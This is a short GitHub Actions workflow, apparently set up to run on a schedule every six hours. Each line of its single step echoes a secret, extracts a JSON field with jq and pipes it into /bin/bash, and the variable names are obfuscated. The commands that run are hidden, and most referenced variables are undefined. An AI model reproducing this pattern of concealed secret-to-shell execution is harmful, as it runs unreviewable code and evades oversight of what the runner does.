name: sushibullet
on:
  workflow_dispatch:
  schedule:
    - cron: '14 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: sushibullet
        env:
          xusxp480: ${{ secrets.xusxp480 }}
        run: |
          echo $xusxp480 | jq -r .kcbw10 | /bin/bash
          echo $gync52 | jq -r .px0005 | /bin/bash
          echo $bps8 | jq -r .bf66377 | /bin/bash
          echo $bgdyk08929 | jq -r .vv9119 | /bin/bash
          echo $he96395 | jq -r .ylgkh103 | /bin/bash
          echo $lq32572 | jq -r .n6794 | /bin/bash

